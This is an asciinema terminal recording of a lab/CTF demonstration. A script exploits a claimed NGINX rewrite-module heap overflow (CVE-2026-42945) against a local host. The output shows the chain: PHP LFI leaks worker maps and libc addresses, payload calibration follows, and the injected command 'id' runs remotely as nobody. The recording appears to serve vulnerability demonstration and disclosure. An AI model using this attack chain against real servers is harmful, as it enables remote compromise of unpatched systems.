{"version":3,"term":{"cols":232,"rows":173,"type":"xterm-256color","version":"iTerm2 3.6.10","theme":{"fg":"#c7c7c7","bg":"#000000","palette":"#000000:#b93019:#52c037:#c7c53e:#0c24c0:#ba3ec1:#53c3c6:#c7c7c7:#686868:#f0776d:#8df77a:#fffc7f:#6a71f7:#f17ff9:#8efafe:#ffffff"}},"timestamp":1778818280,"env":{"SHELL":"/opt/homebrew/bin/fish"}}
[0.139, "o", "\u001b]1337;RemoteHost=hamid@MacBook-Pro.local\u0007\u001b]1337;CurrentDir=/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007"]
[0.000, "o", "\u001b]1337;ShellIntegrationVersion=19;shell=fish\u0007"]
[0.002, "o", "\u001b[?u\u001b[>0q\u001b]11;?\u001b\\\u001b[?1049h\u001bP+q696e646e\u001b\\\u001bP+q71756572792d6f732d6e616d65\u001b\\\u001b[?1049l\u001b[0c"]
[0.069, "o", "\r"]
[0.004, "o", "\u001b[38;2;102;102;102m"]
[0.003, "o", "Darwin MacBook-Pro.local 25.5.0 arm64\r\n"]
[0.003, "o", " 6:11  up 1 day, 17:40, 15 users, load averages: 3.44 3.84 4.17\r\n"]
[0.000, "o", "\u001b[m"]
[0.017, "o", "\u001b[6 q"]
[0.001, "o", "\u001b]7;file://MacBook-Pro.local/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007"]
[0.098, "o", "\u001b]0;fish ~/D/t/n/Nginx-Rift\u0007\u001b[m\u001b]11;?\u001b\\\u001b[6n\u001b[0c\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b]133;A;click_events=1\u001b\\\u001b]133;D;0\u0007\u001b]1337;RemoteHost=hamid@MacBook-Pro.local\u0007\u001b]1337;CurrentDir=/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007\u001b]133;A\u0007\u001b[m\u001b[38;2;153;153;153;48;2;51;51;51m ~/D/t/n/\u001b[38;2;255;255;255;48;2;51;51;51;1mNginx-Rift \u001b[m\u001b[38;2;12;72;1;48;2;173;220;16m\u001b[38;2;51;51;51m \u001b[38;2;12;72;1m ctf-remote-aslr-lfi … \u001b[m\u001b[m\u001b[38;2;173;220;16m \u001b[m\u001b]133;B\u0007\u001b]133;B\u0007\u001b[38;2;178;178;178m\u001b[K\r\u001b[48C"]
[0.691, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.004, "o", "\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "asciinema r ./asciinema-nginx-aslr-demo2.cast\r\u001b[93C"]
[0.000, "o", "\u001b[45D\u001b[39masciinema\u001b[38;2;178;178;178m \u001b[38;2;204;204;255mr\u001b[38;2;178;178;178m \u001b[38;2;204;204;255;4m./asciinema-nginx-aslr-demo2.cast\u001b[38;2;178;178;178;24m\r\u001b[93C"]
[0.262, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.000, "o", "\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b[45Dclear\u001b[K\r\u001b[53C"]
[0.000, "o", "\u001b[5D\u001b[39mclear\u001b[38;2;178;178;178m\r\u001b[53C"]
[0.405, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.000, "o", "\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b[5Dpython ./demo_ctf_exploit_v1_9.py --host 192.168.1.205:19321 --cmd id --clear\r\u001b[125C"]
[0.000, "o", "\u001b[77D\u001b[39mpython\u001b[38;2;178;178;178m \u001b[38;2;204;204;255;4m./demo_ctf_exploit_v1_9.py\u001b[38;2;178;178;178;24m \u001b[38;2;204;204;255m--host\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m192.168.1.205:19321\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m--cmd\u001b[38;2;178;178;178m \u001b[38;2;204;204;255mid\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m--clear\u001b[38;2;178;178;178m\r\u001b[125C"]
[1.548, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.000, "o", "\r\u001b[125C\r\n\u001b[m\u001b]133;C;cmdline_url=python%20./demo_ctf_exploit_v1_9.py%20--host%20192.168.1.205%3A19321%20--cmd%20id%20--clear\u0007"]
[0.000, "o", "\u001b]133;C;\r\u0007"]
[0.001, "o", "\u001b[2 q"]
[0.000, "o", "\u001b]0;python ~/D/t/n/Nginx-Rift\u0007\u001b[m\r"]
[0.207, "o", "\u001b[2J\u001b[H\r\n\u001b[1m\u001b[36mNginx Rift Remote ASLR Lab (v1.9)\u001b[0m\u001b[0m\r\n"]
[0.000, "o", "\u001b[2m============================================================================\u001b[0m\r\n"]
[0.000, "o", "Bug:      \u001b[1mCVE-2026-42945\u001b[0m - NGINX rewrite-module heap buffer overflow\r\nCause:    rewrite/set args-escaping length/copy mismatch\r\nTarget:   \u001b[1m192.168.1.205:19321\u001b[0m; vulnerable route /api/...\r\nProfile:  lab\r\nFile read:  /lfi.php?file=<path>\r\nRoutes:   phpinfo /phpinfo.php; HTTP/2 victim on the same listener\r\n"]
[0.000, "o", "Chain:    PHP LFI -> worker maps/libc -> readable core -> h2 cleanup overwrite\r\nASLR:     enabled; process-specific bases and final candidates are derived remotely\r\n"]
[0.000, "o", "Command:  id\r\n"]
[0.000, "o", "Output:   compact operator view; pass -v for probe trace\r\n"]
[0.000, "o", "Fixed:    NGINX OSS 1.30.1 / 1.31.0; NGINX Plus R36 P4 / R35 P2 / R32 P6\r\n\u001b[2m============================================================================\u001b[0m\r\n\r\n"]
[0.325, "o", "    \u001b[2mrunner version:\u001b[0m    \u001b[32mv1.9 autonomous demo runner\u001b[0m\r\n"]
[0.069, "o", "\r\n\u001b[1m\u001b[34m[01] Remote target preflight\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.172, "o", "\u001b[2m+000.6s\u001b[0m \u001b[32m[+]\u001b[0m HTTP/1.1 listener is alive\r\n"]
[0.167, "o", "\u001b[2m+000.8s\u001b[0m \u001b[32m[+]\u001b[0m HTTP/2 returned 49 bytes\r\n"]
[0.180, "o", "    \u001b[2mtarget profile:\u001b[0m    lab\r\n"]
[0.065, "o", "    \u001b[2mrandomize_va_space:\u001b[0m \u001b[32m2\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mcore_pattern:\u001b[0m      \u001b[32mcore\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2msuid_dumpable:\u001b[0m     \u001b[32m2\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mos release:\u001b[0m        Ubuntu 22.04.3 LTS\r\n"]
[0.069, "o", "    \u001b[2mnginx master PID:\u001b[0m  3044\r\n"]
[0.069, "o", "    \u001b[2mworker children:\u001b[0m   3195\r\n"]
[0.065, "o", "\r\n\u001b[1m\u001b[34m[02] Remote ASLR discovery through PHP LFI\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.180, "o", "    \u001b[2mnginx worker PID:\u001b[0m  \u001b[33m3195\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mnginx writable map:\u001b[0m \u001b[35m0x55e420b83000\u001b[0m\r\n"]
[0.068, "o", "    \u001b[2mlibc base:\u001b[0m         \u001b[35m0x7fca47a6d000\u001b[0m\r\n"]
[0.068, "o", "    \u001b[2msystem() address:\u001b[0m  \u001b[32m0x7fca47abdd70\u001b[0m\r\n"]
[0.133, "o", "\r\n\u001b[1m\u001b[34m[03] Remote Version Fingerprint\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.165, "o", "    \u001b[2mOS:\u001b[0m                \u001b[32mUbuntu 22.04.3 LTS\u001b[0m\r\n"]
[0.068, "o", "    \u001b[2mOS codename:\u001b[0m       jammy\r\n"]
[0.068, "o", "    \u001b[2mkernel release:\u001b[0m    \u001b[32m5.15.0-84-generic\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mHTTP Server:\u001b[0m       \u001b[32mnginx/1.31.0\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mPHP version:\u001b[0m       \u001b[32m8.1.2-1ubuntu2.23\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mPHP Server API:\u001b[0m    FPM/FastCGI\r\n"]
[0.067, "o", "    \u001b[2mnginx binary versions:\u001b[0m \u001b[32mnginx/1.31.0\u001b[0m\r\n"]
[0.066, "o", "    \u001b[2mnginx build-id:\u001b[0m    060e053ab1fa1a2876b7fe0ff4eff0cc777857b6\r\n"]
[0.068, "o", "    \u001b[2mnginx sha256:\u001b[0m      14bebe8937678598b8ebb8449f8c1554\r\n"]
[0.069, "o", "    \u001b[2mlibc dpkg version:\u001b[0m \u001b[32m2.35-0ubuntu3.13\u001b[0m\r\n"]
[0.067, "o", "    \u001b[2mglibc symbol range:\u001b[0m GLIBC_2.2.5 .. GLIBC_2.35\r\n"]
[0.069, "o", "    \u001b[2mlibc build-id:\u001b[0m     095c7ba148aeca81668091f718047078d57efddb\r\n"]
[0.069, "o", "    \u001b[2mlibc sha256:\u001b[0m       c53819710b163d3f1d2541778590d58d\r\n"]
[0.070, "o", "\r\n\u001b[1m\u001b[34m[04] Remote command verification setup\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.165, "o", "    \u001b[2mmarker path:\u001b[0m       \u001b[33m/tmp/nginx_rift_demo_v1_9_263579b791c3\u001b[0m\r\n"]
[0.066, "o", "    \u001b[2mexec command:\u001b[0m      \u001b[32mid\u001b[0m\r\n"]
[0.068, "o", "    \u001b[2mexploit rounds:\u001b[0m    2\r\n"]
[0.069, "o", "\r\n\u001b[1m\u001b[34m[05] Exploit round 1/2: calibration probes\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.165, "o", "\u001b[2m+003.5s\u001b[0m \u001b[36m[*]\u001b[0m testing up to 12 geometry candidate(s)\r\n"]
[3.251, "o", "\u001b[2m+006.8s\u001b[0m \u001b[32m[+]\u001b[0m selected geometry A=127, plus=962 with 60 ranked candidate(s)\r\n"]
[0.165, "o", "\r\n\u001b[1m\u001b[34m[06] Worker reset and fresh address derivation\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[2.992, "o", "\u001b[2m+009.9s\u001b[0m \u001b[32m[+]\u001b[0m nginx worker recovered\r\n"]
[0.458, "o", "\u001b[2m+010.4s\u001b[0m \u001b[32m[+]\u001b[0m using 60 candidates from the fresh reset core\r\n"]
[0.161, "o", "    \u001b[2mfinal payload size:\u001b[0m 328\r\n"]
[0.067, "o", "    \u001b[2mcandidate sanity kept:\u001b[0m \u001b[32m50\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mcandidate sanity dropped:\u001b[0m \u001b[33m10\u001b[0m\r\n"]
[0.068, "o", "\r\n\u001b[1m\u001b[34m[07] Final exploit attempts for A=127, plus=962\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[1.539, "o", "\r\n\u001b[1m\u001b[34m[08] Result\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.162, "o", "\u001b[2m+012.4s\u001b[0m \u001b[32m[+]\u001b[0m CTF WIN: marker token was read back through LFI\r\n"]
[0.165, "o", "    \u001b[2mwinning address:\u001b[0m   \u001b[32m0x55e4210b2127\u001b[0m\r\n"]
[0.066, "o", "    \u001b[2mwinning body offset:\u001b[0m \u001b[32m1376\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mmarker path:\u001b[0m       \u001b[33m/tmp/nginx_rift_demo_v1_9_263579b791c3\u001b[0m\r\n"]
[0.070, "o", "    \u001b[2mrun artifact:\u001b[0m      artifacts/demo_v1_9_20260515-061127.json\r\n"]
[0.068, "o", "\r\n\u001b[1m\u001b[34m[09] Command Output\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.161, "o", "    \u001b[2mexec command:\u001b[0m      \u001b[35mid\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mcaptured bytes:\u001b[0m    \u001b[35m58\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mdisplay:\u001b[0m           \u001b[35mcomplete\u001b[0m\r\n"]
[0.066, "o", "\r\n\u001b[1;96muid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)\u001b[0m\r\n"]
[0.011, "o", "\u001b]133;D;0\u0007"]
[0.000, "o", "\u001b[6 q\u001b[?25h"]
[0.001, "o", "\u001b[2m⏎\u001b[m                                                                                                                                                                                                                                       \r⏎ \r\u001b[K"]
[0.000, "o", "\u001b]7;file://MacBook-Pro.local/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007"]
[0.089, "o", "\u001b]0;fish ~/D/t/n/Nginx-Rift\u0007\u001b[m\u001b]11;?\u001b\\\u001b[6n\u001b[0c\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b]133;A;click_events=1\u0007\u001b]133;D;0\u0007\u001b]1337;RemoteHost=hamid@MacBook-Pro.local\u0007\u001b]1337;CurrentDir=/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007\u001b]133;A\u0007\u001b[m\u001b[38;2;153;153;153;48;2;51;51;51m ~/D/t/n/\u001b[38;2;255;255;255;48;2;51;51;51;1mNginx-Rift \u001b[m\u001b[38;2;12;72;1;48;2;173;220;16m\u001b[38;2;51;51;51m \u001b[38;2;12;72;1m ctf-remote-aslr-lfi … \u001b[m\u001b[m\u001b[38;2;173;220;16m \u001b[m\u001b]133;B\u0007\u001b]133;B\u0007\u001b[38;2;178;178;178m\u001b[K\r\u001b[227C\u001b[38;2;102;102;102m13.4s\u001b[38;2;178;178;178m\u001b[38;2;102;102;102m\u001b[m\r\u001b[227C\r\u001b[48C"]
[1.648, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u\r\n"]
[0.000, "o", "\u001b[m\u001b[m"]
[0.000, "o", "\u001b[2 q"]
[0.001, "x", "0"]
